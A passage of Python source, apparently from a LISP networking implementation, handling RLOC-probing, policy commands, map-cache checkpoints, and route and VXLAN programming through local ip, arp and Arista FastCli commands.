timer = threading.Timer(interval, func, [lisp_sockets])
lisp_rloc_probe_timer = timer
timer.start()
return
#enddef
#
# lisp_show_rloc_probe_list
#
# Print out the lisp_show_rloc_probe_list in a readable way for debugging.
#
def lisp_show_rloc_probe_list():
lprint(bold("----- RLOC-probe-list -----", False))
for key in lisp_rloc_probe_list:
rloc_array = lisp_rloc_probe_list[key]
lprint("RLOC {}:".format(key))
for r, e, g in rloc_array:
lprint(" [{}, {}, {}, {}]".format(hex(id(r)), e.print_prefix(),
g.print_prefix(), r.translated_port))
#endfor
#endfor
lprint(bold("---------------------------", False))
return
#enddef
#
# lisp_mark_rlocs_for_other_eids
#
# When the parent RLOC that we have RLOC-probe state for comes reachable or
# goes unreachable, set the state appropriately for other EIDs using the SAME
# RLOC. The parent is the first RLOC in the eid-list.
#
def lisp_mark_rlocs_for_other_eids(eid_list):
#
# Don't process parent but put its EID in printed list.
#
rloc, e, g = eid_list[0]
eids = [lisp_print_eid_tuple(e, g)]
for rloc, e, g in eid_list[1::]:
rloc.state = LISP_RLOC_UNREACH_STATE
rloc.last_state_change = lisp_get_timestamp()
eids.append(lisp_print_eid_tuple(e, g))
#endfor
unreach = bold("unreachable", False)
rloc_str = red(rloc.rloc.print_address_no_iid(), False)
for eid in eids:
e = green(eid, False)
lprint("RLOC {} went {} for EID {}".format(rloc_str, unreach, e))
#endfor
#
# For each EID, tell external data-plane about new RLOC-set (RLOCs minus
# the ones that just went unreachable).
#
for rloc, e, g in eid_list:
mc = lisp_map_cache.lookup_cache(e, True)
if (mc): lisp_write_ipc_map_cache(True, mc)
#endfor
return
#enddef
#
# lisp_process_rloc_probe_timer
#
# Periodic RLOC-probe timer has expired. Go through cached RLOCs from map-
# cache and decide to suppress or rate-limit RLOC-probes. This function
# is also used to time out "unreachability" state so we can start RLOC-probe
# a previously determined unreachable RLOC.
#
def lisp_process_rloc_probe_timer(lisp_sockets):
lisp_set_exception()
lisp_start_rloc_probe_timer(LISP_RLOC_PROBE_INTERVAL, lisp_sockets)
if (lisp_rloc_probing == False): return
#
# Debug code. Must rebuild image to set boolean to True.
#
if (lisp_print_rloc_probe_list): lisp_show_rloc_probe_list()
#
# Check for egress multi-homing.
#
default_next_hops = lisp_get_default_route_next_hops()
lprint("---------- Start RLOC Probing for {} entries ----------".format( \
len(lisp_rloc_probe_list)))
#
# Walk the list.
#
count = 0
probe = bold("RLOC-probe", False)
for values in lisp_rloc_probe_list.values():
#
# Just do one RLOC-probe for the RLOC even if it is used for
# multiple EID-prefixes.
#
last_rloc = None
for parent_rloc, eid, group in values:
addr_str = parent_rloc.rloc.print_address_no_iid()
#
# Do not RLOC-probe gleaned entries if configured.
#
glean, do_probe, y = lisp_allow_gleaning(eid, None, parent_rloc)
if (glean and do_probe == False):
e = green(eid.print_address(), False)
addr_str += ":{}".format(parent_rloc.translated_port)
lprint("Suppress probe to RLOC {} for gleaned EID {}".format( \
red(addr_str, False), e))
continue
#endif
#
# Do not send RLOC-probes to RLOCs that are in down-state or admin-
# down-state. The RLOC-probe reply will apply for all EID-prefixes
# and the RLOC state will be updated for each.
#
if (parent_rloc.down_state()): continue
#
# Do not send multiple RLOC-probes to the same RLOC for
# different EID-prefixes. Multiple RLOC entries could have
# same RLOC address but differnet translated ports. These
# need to be treated as different ETRs (they are both behind
# the same NAT) from an RTR's perspective. On an ITR, if the
# RLOC-names are different for the same RLOC address, we need
# to treat these as different ETRs since an ITR does not keep
# port state for an RLOC.
#
if (last_rloc):
parent_rloc.last_rloc_probe_nonce = \
last_rloc.last_rloc_probe_nonce
if (last_rloc.translated_port == parent_rloc.translated_port \
and last_rloc.rloc_name == parent_rloc.rloc_name):
e = green(lisp_print_eid_tuple(eid, group), False)
lprint("Suppress probe to duplicate RLOC {} for {}". \
format(red(addr_str, False), e))
#
# Copy last-rloc send probe timer, so all EIDs using the
# same RLOC can have sync'ed rtts.
#
parent_rloc.last_rloc_probe = last_rloc.last_rloc_probe
continue
#endif
#endif
nh = None
rloc = None
while (True):
rloc = parent_rloc if rloc == None else rloc.next_rloc
if (rloc == None): break
#
# First check if next-hop/interface is up for egress multi-
# homing.
#
if (rloc.rloc_next_hop != None):
if (rloc.rloc_next_hop not in default_next_hops):
if (rloc.up_state()):
d, n = rloc.rloc_next_hop
rloc.state = LISP_RLOC_UNREACH_STATE
rloc.last_state_change = lisp_get_timestamp()
lisp_update_rtr_updown(rloc.rloc, False)
#endif
unreach = bold("unreachable", False)
lprint("Next-hop {}({}) for RLOC {} is {}".format(n, d,
red(addr_str, False), unreach))
continue
#endif
#endif
#
# Send RLOC-probe to unreach-state RLOCs if down for a minute.
#
last = rloc.last_rloc_probe
delta = 0 if last == None else time.time() - last
if (rloc.unreach_state() and delta < LISP_RLOC_PROBE_INTERVAL):
lprint("Waiting for probe-reply from RLOC {}".format( \
red(addr_str, False)))
continue
#endif
#
# Check to see if we are in nonce-echo mode and no echo has
# been returned.
#
echo_nonce = lisp_get_echo_nonce(None, addr_str)
if (echo_nonce and echo_nonce.request_nonce_timeout()):
rloc.state = LISP_RLOC_NO_ECHOED_NONCE_STATE
rloc.last_state_change = lisp_get_timestamp()
unreach = bold("unreachable", False)
lprint("RLOC {} went {}, nonce-echo failed".format( \
red(addr_str, False), unreach))
lisp_update_rtr_updown(rloc.rloc, False)
continue
#endif
#
# Suppress sending RLOC probe if we just a nonce-echo in the
# last minute.
#
if (echo_nonce and echo_nonce.recently_echoed()):
lprint(("Suppress RLOC-probe to {}, nonce-echo " + \
"received").format(red(addr_str, False)))
continue
#endif
#
# Check if we have not received a RLOC-probe reply for one
# timer interval. If not, put RLOC state in "unreach-state".
#
if (rloc.last_rloc_probe != None):
last = rloc.last_rloc_probe_reply
if (last == None): last = 0
delta = time.time() - last
if (rloc.up_state() and \
delta >= LISP_RLOC_PROBE_REPLY_WAIT):
rloc.state = LISP_RLOC_UNREACH_STATE
rloc.last_state_change = lisp_get_timestamp()
lisp_update_rtr_updown(rloc.rloc, False)
unreach = bold("unreachable", False)
lprint("RLOC {} went {}, probe it".format( \
red(addr_str, False), unreach))
lisp_mark_rlocs_for_other_eids(values)
#endif
#endif
rloc.last_rloc_probe = lisp_get_timestamp()
reach = "" if rloc.unreach_state() == False else " unreachable"
#
# Send Map-Request RLOC-probe. We may have to send one for each
# egress interface to the same RLOC address. Install host
# route in RLOC so we can direct the RLOC-probe on an egress
# interface.
#
nh_str = ""
n = None
if (rloc.rloc_next_hop != None):
d, n = rloc.rloc_next_hop
lisp_install_host_route(addr_str, n, True)
nh_str = ", send on nh {}({})".format(n, d)
#endif
#
# Print integrated log message before sending RLOC-probe.
#
rtt = rloc.print_rloc_probe_rtt()
astr = addr_str
if (rloc.translated_port != 0):
astr += ":{}".format(rloc.translated_port)
#endif
astr= red(astr, False)
if (rloc.rloc_name != None):
astr += " (" + blue(rloc.rloc_name, False) + ")"
#endif
lprint("Send {}{} {}, last rtt: {}{}".format(probe, reach,
astr, rtt, nh_str))
#
# If we are doing multiple egress interfaces, check for host
# routes. We don't want the ones we selected for forwarding to
# affect the path RLOC-probes go out in the following loop. We
# will restore the host route while waiting for RLOC-replies.
# Then we'll select a new host route based on best RTT.
#
if (rloc.rloc_next_hop != None):
nh = lisp_get_host_route_next_hop(addr_str)
if (nh): lisp_install_host_route(addr_str, nh, False)
#endif
#
# Might be first time and other RLOCs on the chain may not
# have RLOC address. Copy now.
#
if (rloc.rloc.is_null()):
rloc.rloc.copy_address(parent_rloc.rloc)
#endif
#
# Send RLOC-probe Map-Request.
#
seid = None if (group.is_null()) else eid
deid = eid if (group.is_null()) else group
lisp_send_map_request(lisp_sockets, 0, seid, deid, rloc)
last_rloc = parent_rloc
#
# Remove installed host route.
#
if (n): lisp_install_host_route(addr_str, n, False)
#endwhile
#
# Reisntall host route for forwarding.
#
if (nh): lisp_install_host_route(addr_str, nh, True)
#
# Send 10 RLOC-probes and then sleep for 20 ms.
#
count += 1
if ((count % 10) == 0): time.sleep(0.020)
#endfor
#endfor
lprint("---------- End RLOC Probing ----------")
return
#enddef
#
# lisp_update_rtr_updown
#
# The lisp-itr process will send an IPC message to the lisp-etr process for
# the RLOC-probe status change for an RTR.
#
def lisp_update_rtr_updown(rtr, updown):
global lisp_ipc_socket
#
# This is only done on an ITR.
#
if (lisp_i_am_itr == False): return
#
# When the xtr-parameter indicates to register all RTRs, we are doing it
# conditionally so we don't care about the status. Suppress IPC messages.
#
if (lisp_register_all_rtrs): return
rtr_str = rtr.print_address_no_iid()
#
# Check if RTR address is in LISP the lisp-itr process learned from the
# map-server.
#
if (lisp_rtr_list.has_key(rtr_str) == False): return
updown = "up" if updown else "down"
lprint("Send ETR IPC message, RTR {} has done {}".format(
red(rtr_str, False), bold(updown, False)))
#
# Build IPC message.
#
ipc = "rtr%{}%{}".format(rtr_str, updown)
ipc = lisp_command_ipc(ipc, "lisp-itr")
lisp_ipc(ipc, lisp_ipc_socket, "lisp-etr")
return
#enddef
#
# lisp_process_rloc_probe_reply
#
# We have received a RLOC-probe Map-Reply, process it.
#
def lisp_process_rloc_probe_reply(rloc_entry, source, port, map_reply, ttl,
mrloc):
rloc = rloc_entry.rloc
nonce = map_reply.nonce
hc = map_reply.hop_count
probe = bold("RLOC-probe reply", False)
map_reply_addr = rloc.print_address_no_iid()
source_addr = source.print_address_no_iid()
pl = lisp_rloc_probe_list
jt = rloc_entry.json.json_string if rloc_entry.json else None
ts = lisp_get_timestamp()
#
# If this RLOC-probe reply is in response to a RLOC-probe request to a
# multicast RLOC, then store all responses. Create a lisp_rloc() for new
# entries.
#
if (mrloc != None):
multicast_rloc = mrloc.rloc.print_address_no_iid()
if (mrloc.multicast_rloc_probe_list.has_key(map_reply_addr) == False):
nrloc = lisp_rloc()
nrloc = copy.deepcopy(mrloc)
nrloc.rloc.copy_address(rloc)
nrloc.multicast_rloc_probe_list = {}
mrloc.multicast_rloc_probe_list[map_reply_addr] = nrloc
#endif
nrloc = mrloc.multicast_rloc_probe_list[map_reply_addr]
nrloc.last_rloc_probe_nonce = mrloc.last_rloc_probe_nonce
nrloc.last_rloc_probe = mrloc.last_rloc_probe
r, eid, group = lisp_rloc_probe_list[multicast_rloc][0]
nrloc.process_rloc_probe_reply(ts, nonce, eid, group, hc, ttl, jt)
mrloc.process_rloc_probe_reply(ts, nonce, eid, group, hc, ttl, jt)
return
#endif
#
# If we can't find RLOC address from the Map-Reply in the probe-list,
# maybe the same ETR is sending sourcing from a different address. Check
# that address in the probe-list.
#
addr = map_reply_addr
if (pl.has_key(addr) == False):
addr += ":" + str(port)
if (pl.has_key(addr) == False):
addr = source_addr
if (pl.has_key(addr) == False):
addr += ":" + str(port)
lprint(" Received unsolicited {} from {}/{}, port {}". \
format(probe, red(map_reply_addr, False), red(source_addr,
False), port))
return
#endif
#endif
#endif
#
# Look for RLOC in the RLOC-probe list for EID tuple and fix-up stored
# RLOC-probe state.
#
for rloc, eid, group in lisp_rloc_probe_list[addr]:
if (lisp_i_am_rtr):
if (rloc.translated_port != 0 and rloc.translated_port != port):
continue
#endif
#endif
rloc.process_rloc_probe_reply(ts, nonce, eid, group, hc, ttl, jt)
#endfor
return
#enddef
#
# lisp_db_list_length
#
# Returns the number of entries that need to be registered. This will include
# static and dynamic EIDs.
#
def lisp_db_list_length():
count = 0
for db in lisp_db_list:
count += len(db.dynamic_eids) if db.dynamic_eid_configured() else 1
count += len(db.eid.iid_list)
#endif
return(count)
#endif
#
# lisp_is_myeid
#
# Return true if supplied EID is an EID supported by this ETR. That means a
# longest match lookup is done.
#
def lisp_is_myeid(eid):
for db in lisp_db_list:
if (eid.is_more_specific(db.eid)): return(True)
#endfor
return(False)
#enddef
#
# lisp_format_macs
#
# Take two MAC address strings and format them with dashes and place them in
# a format string "0000-1111-2222 -> 3333-4444-5555" for displaying in
# lisp.dprint().
#
def lisp_format_macs(sa, da):
sa = sa[0:4] + "-" + sa[4:8] + "-" + sa[8:12]
da = da[0:4] + "-" + da[4:8] + "-" + da[8:12]
return("{} -> {}".format(sa, da))
#enddef
#
# lisp_get_echo_nonce
#
# Get lisp_nonce_echo() state from lisp_nonce_echo_list{}.
#
def lisp_get_echo_nonce(rloc, rloc_str):
if (lisp_nonce_echoing == False): return(None)
if (rloc): rloc_str = rloc.print_address_no_iid()
echo_nonce = None
if (lisp_nonce_echo_list.has_key(rloc_str)):
echo_nonce = lisp_nonce_echo_list[rloc_str]
#endif
return(echo_nonce)
#enddef
#
# lisp_decode_dist_name
#
# When we have reached an AFI=17 in an EID or RLOC record, return the
# distinguished name, and new position of packet.
#
def lisp_decode_dist_name(packet):
count = 0
dist_name = ""
while(packet[0:1] != "\0"):
if (count == 255): return([None, None])
dist_name += packet[0:1]
packet = packet[1::]
count += 1
#endwhile
packet = packet[1::]
return(packet, dist_name)
#enddef
#
# lisp_write_flow_log
#
# The supplied flow_log variable is an array of [datetime, lisp_packet]. This
# function is called and run in its own thread and then exits.
#
def lisp_write_flow_log(flow_log):
f = open("./logs/lisp-flow.log", "a")
count = 0
for flow in flow_log:
packet = flow[3]
flow_str = packet.print_flow(flow[0], flow[1], flow[2])
f.write(flow_str)
count += 1
#endfor
f.close()
del(flow_log)
count = bold(str(count), False)
lprint("Wrote {} flow entries to ./logs/lisp-flow.log".format(count))
return
#enddef
#
# lisp_policy_command
#
# Configure "lisp policy" commands for all processes that need it.
#
def lisp_policy_command(kv_pair):
p = lisp_policy("")
set_iid = None
match_set = []
for i in range(len(kv_pair["datetime-range"])):
match_set.append(lisp_policy_match())
#endfor
for kw in kv_pair.keys():
value = kv_pair[kw]
#
# Check for match parameters.
#
if (kw == "instance-id"):
for i in range(len(match_set)):
v = value[i]
if (v == ""): continue
match = match_set[i]
if (match.source_eid == None):
match.source_eid = lisp_address(LISP_AFI_NONE, "", 0, 0)
#endif
if (match.dest_eid == None):
match.dest_eid = lisp_address(LISP_AFI_NONE, "", 0, 0)
#endif
match.source_eid.instance_id = int(v)
match.dest_eid.instance_id = int(v)
#endfor
#endif
if (kw == "source-eid"):
for i in range(len(match_set)):
v = value[i]
if (v == ""): continue
match = match_set[i]
if (match.source_eid == None):
match.source_eid = lisp_address(LISP_AFI_NONE, "", 0, 0)
#endif
iid = match.source_eid.instance_id
match.source_eid.store_prefix(v)
match.source_eid.instance_id = iid
#endfor
#endif
if (kw == "destination-eid"):
for i in range(len(match_set)):
v = value[i]
if (v == ""): continue
match = match_set[i]
if (match.dest_eid == None):
match.dest_eid = lisp_address(LISP_AFI_NONE, "", 0, 0)
#endif
iid = match.dest_eid.instance_id
match.dest_eid.store_prefix(v)
match.dest_eid.instance_id = iid
#endfor
#endif
if (kw == "source-rloc"):
for i in range(len(match_set)):
v = value[i]
if (v == ""): continue
match = match_set[i]
match.source_rloc = lisp_address(LISP_AFI_NONE, "", 0, 0)
match.source_rloc.store_prefix(v)
#endfor
#endif
if (kw == "destination-rloc"):
for i in range(len(match_set)):
v = value[i]
if (v == ""): continue
match = match_set[i]
match.dest_rloc = lisp_address(LISP_AFI_NONE, "", 0, 0)
match.dest_rloc.store_prefix(v)
#endfor
#endif
if (kw == "rloc-record-name"):
for i in range(len(match_set)):
v = value[i]
if (v == ""): continue
match = match_set[i]
match.rloc_record_name = v
#endfor
#endif
if (kw == "geo-name"):
for i in range(len(match_set)):
v = value[i]
if (v == ""): continue
match = match_set[i]
match.geo_name = v
#endfor
#endif
if (kw == "elp-name"):
for i in range(len(match_set)):
v = value[i]
if (v == ""): continue
match = match_set[i]
match.elp_name = v
#endfor
#endif
if (kw == "rle-name"):
for i in range(len(match_set)):
v = value[i]
if (v == ""): continue
match = match_set[i]
match.rle_name = v
#endfor
#endif
if (kw == "json-name"):
for i in range(len(match_set)):
v = value[i]
if (v == ""): continue
match = match_set[i]
match.json_name = v
#endfor
#endif
if (kw == "datetime-range"):
for i in range(len(match_set)):
v = value[i]
match = match_set[i]
if (v == ""): continue
l = lisp_datetime(v[0:19])
u = lisp_datetime(v[19::])
if (l.valid_datetime() and u.valid_datetime()):
match.datetime_lower = l
match.datetime_upper = u
#endif
#endfor
#endif
#
# Check for set parameters.
#
if (kw == "set-action"):
p.set_action = value
#endif
if (kw == "set-record-ttl"):
p.set_record_ttl = int(value)
#endif
if (kw == "set-instance-id"):
if (p.set_source_eid == None):
p.set_source_eid = lisp_address(LISP_AFI_NONE, "", 0, 0)
#endif
if (p.set_dest_eid == None):
p.set_dest_eid = lisp_address(LISP_AFI_NONE, "", 0, 0)
#endif
set_iid = int(value)
p.set_source_eid.instance_id = set_iid
p.set_dest_eid.instance_id = set_iid
#endif
if (kw == "set-source-eid"):
if (p.set_source_eid == None):
p.set_source_eid = lisp_address(LISP_AFI_NONE, "", 0, 0)
#endif
p.set_source_eid.store_prefix(value)
if (set_iid != None): p.set_source_eid.instance_id = set_iid
#endif
if (kw == "set-destination-eid"):
if (p.set_dest_eid == None):
p.set_dest_eid = lisp_address(LISP_AFI_NONE, "", 0, 0)
#endif
p.set_dest_eid.store_prefix(value)
if (set_iid != None): p.set_dest_eid.instance_id = set_iid
#endif
if (kw == "set-rloc-address"):
p.set_rloc_address = lisp_address(LISP_AFI_NONE, "", 0, 0)
p.set_rloc_address.store_address(value)
#endif
if (kw == "set-rloc-record-name"):
p.set_rloc_record_name = value
#endif
if (kw == "set-elp-name"):
p.set_elp_name = value
#endif
if (kw == "set-geo-name"):
p.set_geo_name = value
#endif
if (kw == "set-rle-name"):
p.set_rle_name = value
#endif
if (kw == "set-json-name"):
p.set_json_name = value
#endif
if (kw == "policy-name"):
p.policy_name = value
#endif
#endfor
#
# Store match clauses and policy.
#
p.match_clauses = match_set
p.save_policy()
return
#enddef
lisp_policy_commands = {
"lisp policy" : [lisp_policy_command, {
"policy-name" : [True],
"match" : [],
"instance-id" : [True, 0, 0xffffffff],
"source-eid" : [True],
"destination-eid" : [True],
"source-rloc" : [True],
"destination-rloc" : [True],
"rloc-record-name" : [True],
"elp-name" : [True],
"geo-name" : [True],
"rle-name" : [True],
"json-name" : [True],
"datetime-range" : [True],
"set-action" : [False, "process", "drop"],
"set-record-ttl" : [True, 0, 0x7fffffff],
"set-instance-id" : [True, 0, 0xffffffff],
"set-source-eid" : [True],
"set-destination-eid" : [True],
"set-rloc-address" : [True],
"set-rloc-record-name" : [True],
"set-elp-name" : [True],
"set-geo-name" : [True],
"set-rle-name" : [True],
"set-json-name" : [True] } ]
}
#
# lisp_send_to_arista
#
# Send supplied CLI command to Arista so it can be configured via its design
# rules.
#
def lisp_send_to_arista(command, interface):
interface = "" if (interface == None) else "interface " + interface
cmd_str = command
if (interface != ""): cmd_str = interface + ": " + cmd_str
lprint("Send CLI command '{}' to hardware".format(cmd_str))
commands = '''
enable
configure
{}
{}
'''.format(interface, command)
os.system("FastCli -c '{}'".format(commands))
return
#enddef
#
# lisp_arista_is_alive
#
# Ask hardware if EID-prefix is alive. Return True if so.
#
def lisp_arista_is_alive(prefix):
cmd = "enable\nsh plat trident l3 software routes {}\n".format(prefix)
output = commands.getoutput("FastCli -c '{}'".format(cmd))
#
# Skip over header line.
#
output = output.split("\n")[1]
flag = output.split(" ")
flag = flag[-1].replace("\r", "")
#
# Last column has "Y" or "N" for hit bit.
#
return(flag == "Y")
#enddef
#
# lisp_program_vxlan_hardware
#
# This function is going to populate hardware that can do VXLAN encapsulation.
# It will add an IPv4 route via the kernel pointing to a next-hop on a
# VLAN interface that is being bridged to other potential VTEPs.
#
# The responsibility of this routine is to do the following programming:
#
# route add <eid-prefix> <next-hop>
# arp -s <next-hop> <mac-address>
#
# to the kernel and to do this Arista specific command:
#
# mac address-table static <mac-address> vlan 4094 interface vxlan 1
# vtep <vtep-address>
#
# Assumptions are:
#
# (1) Next-hop address is on the subnet for interface vlan4094.
# (2) VXLAN routing is already setup and will bridge <mac-address> to
# the VTEP address this function supplies.
# (3) A "ip virtual-router mac-address" is configured that will match the
# algorithmic mapping this function is doing between VTEP's IP address
# and the MAC address it will listen on to do VXLAN routing.
#
# The required configuration on the VTEPs are:
#
# vlan 4094
# interface vlan4094
# ip address ... ! <next-hop> above point to subnet
#
# interface Vxlan1
# vxlan source-interface Loopback0
# vxlan vlan 4094 vni 10000
# vxlan flood vtep add 17.17.17.17 ! any address to bring up vlan4094
#
# int loopback0
# ip address a.b.c.d/m ! this is the VTEP or RLOC <vtep-address>
#
# ip virtual-router mac-address 0000.00bb.ccdd
#
def lisp_program_vxlan_hardware(mc):
#
# For now, only do this on an Arista system. There isn't a python
# specific signature so just look to see if /persist/local/lispers.net
# exists.
#
if (os.path.exists("/persist/local/lispers.net") == False): return
#
# If no RLOCs, just return. Otherwise program the first RLOC.
#
if (len(mc.best_rloc_set) == 0): return
#
# Get EID-prefix and RLOC (VTEP address) in string form.
#
eid_prefix = mc.eid.print_prefix_no_iid()
rloc = mc.best_rloc_set[0].rloc.print_address_no_iid()
#
# Check to see if route is already present. If so, just return.
#
route = commands.getoutput("ip route get {} | egrep vlan4094".format( \
eid_prefix))
if (route != ""):
lprint("Route {} already in hardware: '{}'".format( \
green(eid_prefix, False), route))
return
#endif
#
# Look for a vxlan interface and a vlan4094 interface. If they do not
# exist, issue message and return. If we don't have an IP address on
# vlan4094, then exit as well.
#
ifconfig = commands.getoutput("ifconfig | egrep 'vxlan|vlan4094'")
if (ifconfig.find("vxlan") == -1):
lprint("No VXLAN interface found, cannot program hardware")
return
#endif
if (ifconfig.find("vlan4094") == -1):
lprint("No vlan4094 interface found, cannot program hardware")
return
#endif
ipaddr = commands.getoutput("ip addr | egrep vlan4094 | egrep inet")
if (ipaddr == ""):
lprint("No IP address found on vlan4094, cannot program hardware")
return
#endif
ipaddr = ipaddr.split("inet ")[1]
ipaddr = ipaddr.split("/")[0]
#
# Get a unique next-hop IP address on vlan4094's subnet. To be used as
# a handle to get VTEP's mac address. And then that VTEP's MAC address
# is a handle to tell VXLAN to encapsulate IP packet (with frame header)
# to the VTEP address.
#
arp_entries = []
arp_lines = commands.getoutput("arp -i vlan4094").split("\n")
for line in arp_lines:
if (line.find("vlan4094") == -1): continue
if (line.find("(incomplete)") == -1): continue
nh = line.split(" ")[0]
arp_entries.append(nh)
#endfor
nh = None
local = ipaddr
ipaddr = ipaddr.split(".")
for i in range(1, 255):
ipaddr[3] = str(i)
addr = ".".join(ipaddr)
if (addr in arp_entries): continue
if (addr == local): continue
nh = addr
break
#endfor
if (nh == None):
lprint("Address allocation failed for vlan4094, cannot program " + \
"hardware")
return
#endif
#
# Derive MAC address from VTEP address an associate it with the next-hop
# address on vlan4094. This MAC address must be the MAC address on the
# foreign VTEP configure with "ip virtual-router mac-address <mac>".
#
rloc_octets = rloc.split(".")
octet1 = lisp_hex_string(rloc_octets[1]).zfill(2)
octet2 = lisp_hex_string(rloc_octets[2]).zfill(2)
octet3 = lisp_hex_string(rloc_octets[3]).zfill(2)
mac = "00:00:00:{}:{}:{}".format(octet1, octet2, octet3)
arista_mac = "0000.00{}.{}{}".format(octet1, octet2, octet3)
arp_command = "arp -i vlan4094 -s {} {}".format(nh, mac)
os.system(arp_command)
#
# Add VXLAN entry for MAC address.
#
vxlan_command = ("mac address-table static {} vlan 4094 " + \
"interface vxlan 1 vtep {}").format(arista_mac, rloc)
lisp_send_to_arista(vxlan_command, None)
#
# Add route now connecting: eid-prefix -> next-hop -> mac-address ->
# VTEP address.
#
route_command = "ip route add {} via {}".format(eid_prefix, nh)
os.system(route_command)
lprint("Hardware programmed with commands:")
route_command = route_command.replace(eid_prefix, green(eid_prefix, False))
lprint(" " + route_command)
lprint(" " + arp_command)
vxlan_command = vxlan_command.replace(rloc, red(rloc, False))
lprint(" " + vxlan_command)
return
#enddef
#
# lisp_clear_hardware_walk
#
# Remove EID-prefix from kernel.
#
def lisp_clear_hardware_walk(mc, parms):
prefix = mc.eid.print_prefix_no_iid()
os.system("ip route delete {}".format(prefix))
return([True, None])
#enddef
#
# lisp_clear_map_cache
#
# Just create a new lisp_cache data structure. But if we have to program
# hardware, traverse the map-cache.
#
def lisp_clear_map_cache():
global lisp_map_cache, lisp_rloc_probe_list
global lisp_crypto_keys_by_rloc_encap, lisp_crypto_keys_by_rloc_decap
global lisp_rtr_list, lisp_gleaned_groups
global lisp_no_map_request_rate_limit
clear = bold("User cleared", False)
count = lisp_map_cache.cache_count
lprint("{} map-cache with {} entries".format(clear, count))
if (lisp_program_hardware):
lisp_map_cache.walk_cache(lisp_clear_hardware_walk, None)
#endif
lisp_map_cache = lisp_cache()
#
# Clear rate-limiting temporarily.
#
lisp_no_map_request_rate_limit = lisp_get_timestamp()
#
# Need to clear the RLOC-probe list or else we'll have RLOC-probes
# create incomplete RLOC-records.
#
lisp_rloc_probe_list = {}
#
# Also clear the encap and decap lisp-crypto arrays.
#
lisp_crypto_keys_by_rloc_encap = {}
lisp_crypto_keys_by_rloc_decap = {}
#
# If we are an ITR, clear the RTR-list so a new set of default routes can
# be added when the next Info-Reply comes in.
#
lisp_rtr_list = {}
#
# Clear gleaned groups data structure.
#
lisp_gleaned_groups = {}
#
# Tell external data-plane.
#
lisp_process_data_plane_restart(True)
return
#enddef
#
# lisp_encapsulate_rloc_probe
#
# Input to this function is a RLOC-probe Map-Request and the NAT-traversal
# information for an ETR that sits behind a NAT. We need to get the RLOC-probe
# through the NAT so we have to data encapsulated with a source-port of 4341
# and a destination adddress and port that was translated by the NAT. That
# information is in the lisp_nat_info() class.
#
def lisp_encapsulate_rloc_probe(lisp_sockets, rloc, nat_info, packet):
if (len(lisp_sockets) != 4): return
local_addr = lisp_myrlocs[0]
#
# Build Map-Request IP header. Source and destination addresses same as
# the data encapsulation outer header.
#
length = len(packet) + 28
ip = struct.pack("BBHIBBHII", 0x45, 0, socket.htons(length), 0, 64,
17, 0, socket.htonl(local_addr.address), socket.htonl(rloc.address))
ip = lisp_ip_checksum(ip)
udp = struct.pack("HHHH", 0, socket.htons(LISP_CTRL_PORT),
socket.htons(length - 20), 0)
#
# Start data encapsulation logic.
#
packet = lisp_packet(ip + udp + packet)
#
# Setup fields we need for lisp_packet.encode().
#
packet.inner_dest.copy_address(rloc)
packet.inner_dest.instance_id = 0xffffff
packet.inner_source.copy_address(local_addr)
packet.inner_ttl = 64
packet.outer_dest.copy_address(rloc)
packet.outer_source.copy_address(local_addr)
packet.outer_version = packet.outer_dest.afi_to_version()
packet.outer_ttl = 64
packet.encap_port = nat_info.port if nat_info else LISP_DATA_PORT
rloc_str = red(rloc.print_address_no_iid(), False)
if (nat_info):
hostname = " {}".format(blue(nat_info.hostname, False))
probe = bold("RLOC-probe request", False)
else:
hostname = ""
probe = bold("RLOC-probe reply", False)
#endif
lprint(("Data encapsulate {} to {}{} port {} for " + \
"NAT-traversal").format(probe, rloc_str, hostname, packet.encap_port))
#
# Build data encapsulation header.
#
if (packet.encode(None) == None): return
packet.print_packet("Send", True)
raw_socket = lisp_sockets[3]
packet.send_packet(raw_socket, packet.outer_dest)
del(packet)
return
#enddef
#
# lisp_get_default_route_next_hops
#
# Put the interface names of each next-hop for the IPv4 default in an array
# and return to caller. The array has elements of [<device>, <nh>].
#
def lisp_get_default_route_next_hops():
#
# Get default route next-hop info differently for MacOS.
#
if (lisp_is_macos()):
cmd = "route -n get default"
fields = commands.getoutput(cmd).split("\n")
gw = interface = None
for f in fields:
if (f.find("gateway: ") != -1): gw = f.split(": ")[1]
if (f.find("interface: ") != -1): interface = f.split(": ")[1]
#endfor
return([[interface, gw]])
#endif
#
# Get default route next-hop info for Linuxes.
#
cmd = "ip route | egrep 'default via'"
default_routes = commands.getoutput(cmd).split("\n")
next_hops = []
for route in default_routes:
if (route.find(" metric ") != -1): continue
r = route.split(" ")
try:
via_index = r.index("via") + 1
if (via_index >= len(r)): continue
dev_index = r.index("dev") + 1
if (dev_index >= len(r)): continue
except:
continue
#endtry
next_hops.append([r[dev_index], r[via_index]])
#endfor
return(next_hops)
#enddef
#
# lisp_get_host_route_next_hop
#
# For already installed host route, get next-hop.
#
def lisp_get_host_route_next_hop(rloc):
cmd = "ip route | egrep '{} via'".format(rloc)
route = commands.getoutput(cmd).split(" ")
try: index = route.index("via") + 1
except: return(None)
if (index >= len(route)): return(None)
return(route[index])
#enddef
#
# lisp_install_host_route
#
# Install/deinstall host route.
#
def lisp_install_host_route(dest, nh, install):
install = "add" if install else "delete"
nh_str = "none" if nh == None else nh
lprint("{} host-route {}, nh {}".format(install.title(), dest, nh_str))
if (nh == None):
ar = "ip route {} {}/32".format(install, dest)
else:
ar = "ip route {} {}/32 via {}".format(install, dest, nh)
#endif
os.system(ar)
return
#enddef
#
# lisp_checkpoint
#
# This function will write entries from the checkpoint array to the checkpoint
# file "lisp.checkpoint".
#
def lisp_checkpoint(checkpoint_list):
if (lisp_checkpoint_map_cache == False): return
f = open(lisp_checkpoint_filename, "w")
for entry in checkpoint_list:
f.write(entry + "\n")
#endfor
f.close()
lprint("{} {} entries to file '{}'".format(bold("Checkpoint", False),
len(checkpoint_list), lisp_checkpoint_filename))
return
#enddef
#
# lisp_load_checkpoint
#
# Read entries from checkpoint file and write to map cache. Check function
# lisp_write_checkpoint_entry() for entry format description.
#
def lisp_load_checkpoint():
if (lisp_checkpoint_map_cache == False): return
if (os.path.exists(lisp_checkpoint_filename) == False): return
f = open(lisp_checkpoint_filename, "r")
count = 0
for entry in f:
count += 1
e = entry.split(" rloc ")
rlocs = [] if (e[1] in ["native-forward\n", "\n"]) else \
e[1].split(", ")
rloc_set = []
for rloc in rlocs:
rloc_entry = lisp_rloc(False)
r = rloc.split(" ")
rloc_entry.rloc.store_address(r[0])
rloc_entry.priority = int(r[1])
rloc_entry.weight = int(r[2])
rloc_set.append(rloc_entry)
#endfor
mc = lisp_mapping("", "", rloc_set)
if (mc != None):
